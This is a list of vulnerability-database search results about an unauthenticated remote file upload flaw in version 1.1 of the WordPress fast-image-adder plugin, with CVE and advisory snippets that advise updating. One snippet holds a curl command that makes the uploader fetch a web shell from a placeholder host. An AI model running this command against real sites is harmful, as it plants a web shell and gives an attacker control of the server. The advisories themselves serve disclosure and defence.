10 matches found
EUVD-2015-1009
Malware in sbrugna...
Wordpress fast-image-adder plugin remote file upload vulnerability
WordPress is the WordPress Software Foundation's set of blogging platform developed using the PHP language. fast-image-adder is one of the image fast-adder plugin. A remote file upload vulnerability exists in the fast-image-adder-uploader.php file in Wordpress fast-image-adder plugin v1.1 and...
CVE-2015-1000001
Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin...
Design/Logic Flaw
Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin...
CVE-2015-1000001
The CVE-2015-1000001 entry maps to WordPress plugin fast-image-adder (v1.1 and earlier). A Remote File Upload vulnerability exists in the uploader script (fast-image-adder-uploader.php), allowing an unauthenticated attacker to upload arbitrary files to the server (potentially leading to web shell...
CVE-2015-1000001
Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin...
WordPress Fast Image Adder 1.1 Shell Upload Vulnerability
WordPress Fast Image Adder plugin version 1.1 suffers from a remote shell upload vulnerability. Title: Remote file upload vulnerability in fast-image-adder v1.1 Wordpress plugin Author: Larry W. Cashdollar, @larry0 Date: 2015-07-10 Download Site: https://wordpress.org/plugins/fast-image-adder...
WordPress Fast Image Adder Plugin <= 1.1 - Remote File Upload
This plugin is prone to a remote file upload vulnerability, because the fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files. It creates a random file name, but reports the name back to the user. Solution Update the plugin...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...
WordPress Fast Image Adder Plugin <= 1.1 - Remote File Upload
This plugin is prone to a remote file upload vulnerability, because the fast-image-adder-uploader.php file doesn't check if a user is authorized to upload files. It creates a random file name, but reports the name back to the user. Solution Update the plugin...